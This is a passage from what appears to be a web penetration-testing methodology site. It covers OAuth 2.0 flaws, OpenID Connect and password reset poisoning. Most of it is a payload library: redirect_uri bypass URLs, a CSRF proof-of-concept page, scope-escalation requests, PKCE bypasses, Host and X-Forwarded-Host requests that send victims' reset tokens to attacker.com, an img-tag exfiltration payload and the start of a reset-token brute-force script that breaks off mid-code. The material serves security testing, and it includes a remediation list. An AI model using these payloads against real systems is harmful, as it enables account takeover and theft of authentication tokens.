etc.)</li> <li><input disabled="" type="checkbox"> Test token endpoint for client auth weaknesses (no secret required)</li> <li><input disabled="" type="checkbox"> Check access token scope escalation</li> <li><input disabled="" type="checkbox"> Check token leakage in Referer, logs, URL parameters</li> <li><input disabled="" type="checkbox"> Test account linking/pre-linking CSRF</li> <li><input disabled="" type="checkbox"> Test implicit flow token theft via open redirect</li> <li><input disabled="" type="checkbox"> Check for <code>/.well-known/oauth-authorization-server</code> or <code>/.well-known/openid-configuration</code></li> <li><input disabled="" type="checkbox"> Review <code>scope</code> parameter for privilege escalation</li> <li><input disabled="" type="checkbox"> Test authorization code reuse (should be single-use)</li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="attack-1--redirect_uri-bypass">Attack 1 — <code>redirect_uri</code> Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Strict match bypass — add trailing slash or path component:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Registered: https://app.com/callback</span> </span></span><span style="display:flex;"><span>https://app.com/callback/ </span></span><span style="display:flex;"><span>https://app.com/callback/extra </span></span><span style="display:flex;"><span>https://app.com/callback%0d%0a </span></span><span style="display:flex;"><span>https://app.com/callback%2f..%2fattacker </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Query string append (if server checks prefix only):</span> </span></span><span style="display:flex;"><span>https://app.com/callback?next<span style="color:#f92672">=</span>https://attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Fragment bypass:</span> </span></span><span style="display:flex;"><span>https://app.com/callback#https://attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Path traversal out of registered path:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Registered: https://app.com/oauth/callback</span> </span></span><span style="display:flex;"><span>https://app.com/oauth/callback/../../../attacker-path </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Subdomain wildcards — if registered *.app.com:</span> </span></span><span style="display:flex;"><span>https://attacker.app.com/callback </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># URL parser confusion (duplicate host):</span> </span></span><span style="display:flex;"><span>https://app.com@attacker.com/callback </span></span><span style="display:flex;"><span>https://attacker.com#app.com/callback </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Full open redirect chain:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 1. Find open redirect on app.com: /redirect?url=https://attacker.com</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 2. Register redirect_uri as: https://app.com/redirect?url=https://attacker.com</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 3. Auth code leaks via Referer to attacker.com</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Craft full attack URL:</span> </span></span><span style="display:flex;"><span>https://authorization-server.com/authorize? </span></span><span style="display:flex;"><span> client_id<span style="color:#f92672">=</span>APP_CLIENT_ID&amp; </span></span><span style="display:flex;"><span> response_type<span style="color:#f92672">=</span>code&amp; </span></span><span style="display:flex;"><span> redirect_uri<span style="color:#f92672">=</span>https://app.com/redirect?url<span style="color:#f92672">=</span>https://attacker.com&amp; </span></span><span style="display:flex;"><span> scope<span style="color:#f92672">=</span>profile+email&amp; </span></span><span style="display:flex;"><span> state<span style="color:#f92672">=</span>STOLEN_STATE </span></span></code></pre></div><h3 id="attack-2--missing--predictable-state-parameter-csrf-on-oauth">Attack 2 — Missing / Predictable <code>state</code> Parameter (CSRF on OAuth)</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Check if state is missing:</span> </span></span><span style="display:flex;"><span>GET /authorize?client_id<span style="color:#f92672">=</span>X&amp;redirect_uri<span style="color:#f92672">=</span>https://app.com/cb&amp;response_type<span style="color:#f92672">=</span>code&amp;scope<span style="color:#f92672">=</span>email </span></span><span style="display:flex;"><span><span style="color:#75715e"># → No state= parameter → CSRF-based account hijack possible</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If state is predictable (sequential, timestamp):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Monitor multiple auth flows → detect pattern</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># CSRF attack — force victim to link attacker&#39;s account:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 1. Attacker starts OAuth flow, gets state+code from own account</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 2. Attacker builds URL: /callback?code=ATTACKER_CODE&amp;state=...</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 3. Attacker tricks victim into visiting that URL</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 4. Victim&#39;s session gets linked to attacker&#39;s OAuth identity</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># PoC page:</span> </span></span><span style="display:flex;"><span>&lt;img src<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;https://app.com/oauth/callback?code=ATTACKER_AUTH_CODE&#34;</span> width<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> height<span style="color:#f92672">=</span>0&gt; </span></span></code></pre></div><h3 id="attack-3--authorization-code-interception-implicit-flow">Attack 3 — Authorization Code Interception (Implicit Flow)</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Implicit flow: token delivered in URL fragment → leaks via Referer, history, logs</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If app uses response_type=token (implicit):</span> </span></span><span style="display:flex;"><span>https://as.com/authorize?client_id<span style="color:#f92672">=</span>X&amp;response_type<span style="color:#f92672">=</span>token&amp;redirect_uri<span style="color:#f92672">=</span>https://app.com/cb </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Steal token via open redirect in redirect_uri:</span> </span></span><span style="display:flex;"><span>https://as.com/authorize? </span></span><span style="display:flex;"><span> client_id<span style="color:#f92672">=</span>X&amp; </span></span><span style="display:flex;"><span> response_type<span style="color:#f92672">=</span>token&amp; </span></span><span style="display:flex;"><span> redirect_uri<span style="color:#f92672">=</span>https://app.com/redir?goto<span style="color:#f92672">=</span>https://attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Token in fragment: https://attacker.com#access_token=TOKEN&amp;token_type=bearer</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Attacker JS reads location.hash → steals token</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Force implicit flow even if app uses code flow:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Change response_type=code to response_type=token</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If AS allows both → token in URL, no code exchange needed</span> </span></span></code></pre></div><h3 id="attack-4--scope-escalation">Attack 4 — Scope Escalation</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Request more scopes than application intended:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Registered scopes: profile email</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Try adding: admin write delete openid</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>https://as.com/authorize? </span></span><span style="display:flex;"><span> client_id<span style="color:#f92672">=</span>LEGITIMATE_APP_ID&amp; </span></span><span style="display:flex;"><span> response_type<span style="color:#f92672">=</span>code&amp; </span></span><span style="display:flex;"><span> redirect_uri<span style="color:#f92672">=</span>https://app.com/callback&amp; </span></span><span style="display:flex;"><span> scope<span style="color:#f92672">=</span>profile+email+admin+write </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If AS doesn&#39;t validate scope against client registration → escalated token</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Try undocumented scopes:</span> </span></span><span style="display:flex;"><span>scope<span style="color:#f92672">=</span>profile </span></span><span style="display:flex;"><span>scope<span style="color:#f92672">=</span>profile email admin </span></span><span style="display:flex;"><span>scope<span style="color:#f92672">=</span>openid profile email phone address </span></span><span style="display:flex;"><span>scope<span style="color:#f92672">=</span>offline_access <span style="color:#75715e"># get refresh token</span> </span></span><span style="display:flex;"><span>scope<span style="color:#f92672">=</span>https://graph.microsoft.com/.default <span style="color:#75715e"># Azure AD full access</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Use legitimate client_id with expanded scope — token issued to legitimate app</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># but contains elevated permissions not intended for that client</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># GraphQL-style scope: some APIs use resource-based scopes</span> </span></span><span style="display:flex;"><span>scope<span style="color:#f92672">=</span>read:users write:users delete:users admin:org </span></span></code></pre></div><h3 id="attack-5--authorization-code-reuse">Attack 5 — Authorization Code Reuse</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Authorization codes must be single-use. Test reuse:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 1. Complete OAuth flow → capture code from redirect</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 2. Re-submit same code:</span> </span></span><span style="display:flex;"><span>POST /oauth/token HTTP/1.1 </span></span><span style="display:flex;"><span>Host: as.com </span></span><span style="display:flex;"><span>Content-Type: application/x-www-form-urlencoded </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>grant_type<span style="color:#f92672">=</span>authorization_code&amp; </span></span><span style="display:flex;"><span>code<span style="color:#f92672">=</span>AUTH_CODE_JUST_USED&amp; </span></span><span style="display:flex;"><span>redirect_uri<span style="color:#f92672">=</span>https://app.com/callback&amp; </span></span><span style="display:flex;"><span>client_id<span style="color:#f92672">=</span>CLIENT_ID&amp; </span></span><span style="display:flex;"><span>client_secret<span style="color:#f92672">=</span>CLIENT_SECRET </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If reuse works → token issued twice → code theft attack viable</span> </span></span></code></pre></div><h3 id="attack-6--token-leakage-via-referer">Attack 6 — Token Leakage via Referer</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Authorization code in URL gets logged in:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Browser history</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Server access logs</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Referer header to next page&#39;s external resources (scripts, images, trackers)</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test: after OAuth callback (URL has ?code=...), check:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Does page load external resources (scripts, images)?</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Is Referer header sent with those requests?</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># → Referer contains auth code → any external origin sees it</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Intercept with Burp and check outgoing Referer headers after /callback</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># For implicit flow: fragment (#access_token=...) is not sent in Referer</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># But single-page apps often pass it via postMessage or XHR → check JS handling</span> </span></span></code></pre></div><h3 id="attack-7--account-pre-linking--takeover">Attack 7 — Account Pre-Linking / Takeover</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Scenario: App allows &#34;link your Google account&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Attack: Pre-link victim&#39;s email to attacker&#39;s account before victim registers</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 1. Attacker registers with victim@gmail.com (if email not verified)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 2. OR: attacker uses CSRF to link OAuth account to existing target account</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 3. Victim later registers/links → attacker already has access</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Also: OAuth account takeover via email collision:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If IDP A and IDP B both return same email → app merges accounts</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Register on IDP A with victim@gmail.com (unverified allowed)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Victim registers directly with password → attacker&#39;s OAuth links to it</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check: does app require email verification before OAuth account linking?</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Does app match accounts by email across different OAuth providers?</span> </span></span></code></pre></div><h3 id="attack-8--pkce-bypass">Attack 8 — PKCE Bypass</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># PKCE (Proof Key for Code Exchange) — S256 or plain challenge</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># code_verifier → SHA256 → base64url → code_challenge</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If server accepts plain method (no hash):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># code_challenge = code_verifier (same value)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If server doesn&#39;t validate method: submit without code_verifier in exchange</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Intercept authorization request:</span> </span></span><span style="display:flex;"><span>GET /authorize? </span></span><span style="display:flex;"><span> code_challenge<span style="color:#f92672">=</span>E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM&amp; </span></span><span style="display:flex;"><span> code_challenge_method<span style="color:#f92672">=</span>S256&amp; </span></span><span style="display:flex;"><span> ... </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Manipulate to plain:</span> </span></span><span style="display:flex;"><span>code_challenge_method<span style="color:#f92672">=</span>plain </span></span><span style="display:flex;"><span>code_challenge<span style="color:#f92672">=</span>&lt;plaintext_verifier&gt; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Skip PKCE in token exchange:</span> </span></span><span style="display:flex;"><span>POST /token </span></span><span style="display:flex;"><span>grant_type<span style="color:#f92672">=</span>authorization_code&amp;code<span style="color:#f92672">=</span>CODE&amp;redirect_uri<span style="color:#f92672">=</span>URI </span></span><span style="display:flex;"><span><span style="color:#75715e"># Omit code_verifier entirely → if server doesn&#39;t enforce it</span> </span></span></code></pre></div><hr> <h2 id="tools">Tools</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># OAuth 2.0 testing with Burp Suite:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Extension: &#34;OAuth Scan&#34; (BApp Store)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Extension: &#34;CSRF Scanner&#34; for state check</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># - Repeater: replay auth codes, modify scope, test redirect_uri</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Manual token decode:</span> </span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;ACCESS_TOKEN&#34;</span> | cut -d. -f2 | base64 -d 2&gt;/dev/null | python3 -m json.tool </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># oauth2-proxy fuzzing:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test redirect_uri with ffuf:</span> </span></span><span style="display:flex;"><span>ffuf -u <span style="color:#e6db74">&#34;https://as.com/authorize?client_id=X&amp;redirect_uri=FUZZ&amp;response_type=code&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -w redirect_uri_payloads.txt </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check .well-known:</span> </span></span><span style="display:flex;"><span>curl -s https://target.com/.well-known/openid-configuration | python3 -m json.tool </span></span><span style="display:flex;"><span>curl -s https://target.com/.well-known/oauth-authorization-server | python3 -m json.tool </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Find OAuth endpoints via JS source:</span> </span></span><span style="display:flex;"><span>grep -r <span style="color:#e6db74">&#34;oauth\|authorize\|redirect_uri\|client_id&#34;</span> js/ --include<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;*.js&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># jwt_tool for inspecting tokens:</span> </span></span><span style="display:flex;"><span>python3 jwt_tool.py ACCESS_TOKEN </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Test scope explosion — pass all known OAuth scopes:</span> </span></span><span style="display:flex;"><span>scope<span style="color:#f92672">=</span>openid+profile+email+phone+address+offline_access+admin+write+read+delete </span></span></code></pre></div><hr> <h2 id="remediation-reference">Remediation Reference</h2> <ul> <li><strong>Strict <code>redirect_uri</code> validation</strong>: exact match only, no wildcard, no path prefix matching</li> <li><strong>Enforce <code>state</code> parameter</strong>: cryptographically random, bound to session, validated on return</li> <li><strong>Single-use authorization codes</strong>: invalidate after first use, short TTL (&lt; 60 seconds)</li> <li><strong>PKCE required</strong> for public clients and mobile apps — reject <code>plain</code> method</li> <li><strong>Scope allowlist per client</strong>: don&rsquo;t let clients request scopes beyond registration</li> <li><strong>Bind access tokens to client</strong>: verify <code>client_id</code> on every token introspection</li> <li><strong>Never include tokens in URLs</strong>: use POST body or Authorization header only</li> <li><strong>Verify email before account linking/merging</strong> across OAuth providers</li> </ul> <p><em>Part of the Web Application Penetration Testing Methodology series.</em></p> OpenID Connect (OIDC) Vulnerabilities https://az0th.it/web/auth/037-auth-oidc/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/037-auth-oidc/ <h1 id="openid-connect-oidc-vulnerabilities">OpenID Connect (OIDC) Vulnerabilities</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-287, CWE-346 <strong>OWASP</strong>: A07:2021 – Identification and Authentication Failures | A01:2021 – Broken Access Control</p> </blockquote> <hr> <h2 id="what-is-oidc">What Is OIDC?</h2> <p>OpenID Connect (OIDC) is an identity layer built on top of OAuth 2.0. While OAuth handles authorization (who can access what), OIDC handles authentication (who the user is). It introduces the <strong>ID Token</strong> — a JWT containing identity claims — and the <code>UserInfo</code> endpoint for additional claims.</p> Password Reset Poisoning https://az0th.it/web/auth/038-auth-password-reset-poisoning/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/auth/038-auth-password-reset-poisoning/ <h1 id="password-reset-poisoning">Password Reset Poisoning</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-640, CWE-601 <strong>OWASP</strong>: A07:2021 – Identification and Authentication Failures</p> </blockquote> <hr> <h2 id="what-is-password-reset-poisoning">What Is Password Reset Poisoning?</h2> <p>Password reset poisoning exploits the generation of password reset links using attacker-influenced inputs — most commonly the <code>Host</code> header, <code>X-Forwarded-Host</code>, or other headers that control the domain embedded in the reset link.</p> <pre tabindex="0"><code>Normal flow: POST /reset → App generates https://target.com/reset?token=abc → Email sent Poisoned flow: POST /reset Host: attacker.com ← modified → App generates https://attacker.com/reset?token=abc → Email sent → Victim clicks → token delivered to attacker.com → Attacker resets victim&#39;s password </code></pre><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <ul> <li><input disabled="" type="checkbox"> Find the password reset request (POST /forgot-password, /reset-password, etc.)</li> <li><input disabled="" type="checkbox"> Modify <code>Host</code> header → check if reflected in reset link (monitor email or OOB)</li> <li><input disabled="" type="checkbox"> Test <code>X-Forwarded-Host</code>, <code>X-Host</code>, <code>X-Forwarded-Server</code>, <code>X-HTTP-Host-Override</code></li> <li><input disabled="" type="checkbox"> Test <code>Referer</code> header — some apps use it to build base URL</li> <li><input disabled="" type="checkbox"> Test <code>Host</code> with port: <code>target.com:attacker.com</code> — host confusion</li> <li><input disabled="" type="checkbox"> Test with Burp Collaborator as header value</li> <li><input disabled="" type="checkbox"> Test token predictability — sequential, time-based, short length</li> <li><input disabled="" type="checkbox"> Test token expiry — does it expire? After how long?</li> <li><input disabled="" type="checkbox"> Test token reuse — can same token be used twice?</li> <li><input disabled="" type="checkbox"> Test for token in URL (GET-based reset) — Referer leakage</li> <li><input disabled="" type="checkbox"> Check if token is leaked in response body, JSON, or other headers</li> <li><input disabled="" type="checkbox"> Test same token for all accounts (global/static token)</li> <li><input disabled="" type="checkbox"> Test race condition: request reset → use token → request again</li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="attack-1--host-header-poisoning">Attack 1 — Host Header Poisoning</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Step 1: Identify the password reset endpoint</span> </span></span><span style="display:flex;"><span>POST /forgot-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>Content-Type: application/x-www-form-urlencoded </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>email<span style="color:#f92672">=</span>victim@corp.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Step 2: Modify Host to attacker-controlled (use Burp Collaborator):</span> </span></span><span style="display:flex;"><span>POST /forgot-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: COLLABORATOR_ID.oast.pro </span></span><span style="display:flex;"><span>Content-Type: application/x-www-form-urlencoded </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>email<span style="color:#f92672">=</span>victim@corp.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Step 3: Check Collaborator for incoming request with token</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># e.g.: GET /reset?token=VICTIM_TOKEN HTTP/1.1 Host: COLLABORATOR_ID.oast.pro</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Step 4: Use token to reset victim&#39;s password</span> </span></span><span style="display:flex;"><span>POST /reset-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>Content-Type: application/x-www-form-urlencoded </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>token<span style="color:#f92672">=</span>VICTIM_TOKEN&amp;password<span style="color:#f92672">=</span>NewPassword123&amp;confirm<span style="color:#f92672">=</span>NewPassword123 </span></span></code></pre></div><h3 id="attack-2--x-forwarded-host-override">Attack 2 — X-Forwarded-Host Override</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Many frameworks prefer X-Forwarded-Host over Host for URL generation:</span> </span></span><span style="display:flex;"><span>POST /forgot-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Forwarded-Host: attacker.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>email<span style="color:#f92672">=</span>victim@corp.com </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Variants to test:</span> </span></span><span style="display:flex;"><span>X-Host: attacker.com </span></span><span style="display:flex;"><span>X-Forwarded-Server: attacker.com </span></span><span style="display:flex;"><span>X-Original-Host: attacker.com </span></span><span style="display:flex;"><span>X-Rewrite-URL: https://attacker.com/reset </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Password reset via API (JSON body):</span> </span></span><span style="display:flex;"><span>POST /api/auth/forgot-password HTTP/1.1 </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Forwarded-Host: attacker.com </span></span><span style="display:flex;"><span>Content-Type: application/json </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;email&#34;</span>: <span style="color:#e6db74">&#34;victim@corp.com&#34;</span><span style="color:#f92672">}</span> </span></span></code></pre></div><h3 id="attack-3--dangling-markup-via-host-injection">Attack 3 — Dangling Markup via Host Injection</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># If only part of the URL is controlled:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Host injection → partial reset link poisoning</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Inject newline to add hidden header / exfil via img tag:</span> </span></span><span style="display:flex;"><span>Host: target.com </span></span><span style="display:flex;"><span>X-Forwarded-Host: attacker.com<span style="color:#e6db74">&#34;&gt;&lt;img src=&#34;</span>https://attacker.com/?x<span style="color:#f92672">=</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># The email HTML becomes:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Reset your password: https://attacker.com&#34;&gt;&lt;img src=&#34;https://attacker.com/?x=.../reset?token=abc</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># → If email client renders HTML: token in img src request to attacker</span> </span></span></code></pre></div><h3 id="attack-4--token-analysis-and-brute-force">Attack 4 — Token Analysis and Brute Force</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Analyze token structure:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Request multiple resets for your own account → compare tokens</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Token A: 5f4dcc3b5aa765d61d8327de (hex-encoded MD5?)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Token B: 6cb75f652a9b52798eb6cf2201057c73</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Token C: 098f6bcd4621d373cade4e832627b4f6</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># MD5/SHA1 check:</span> </span></span><span style="display:flex;"><span>echo -n <span style="color:#e6db74">&#34;password&#34;</span> | md5sum <span style="color:#75715e"># 5f4dcc3b5aa765d61d8327de</span> </span></span><span style="display:flex;"><span>echo -n <span style="color:#e6db74">&#34;test&#34;</span> | md5sum <span style="color:#75715e"># 098f6bcd4621d373cade4e832627b4f6</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If token = md5(email):</span> </span></span><span style="display:flex;"><span>echo -n <span style="color:#e6db74">&#34;victim@corp.com&#34;</span> | md5sum </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># If token = md5(username + timestamp):</span> </span></span><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#34;import hashlib,time; print(hashlib.md5(f&#39;admin{int(time.time())}&#39;.encode()).hexdigest())&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Sequential token detection:</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Token 1: 1001, Token 2: 1002 → Token for admin may be 1003</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Short token brute force (6-char alphanumeric = 56 billion but 6-digit numeric = 1M):</span> </span></span><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">import requests, string, itertools </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">chars = string.digits </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">for token in itertools.product(chars, repeat=6): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> t = &#39;&#39;.join(token) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> r = 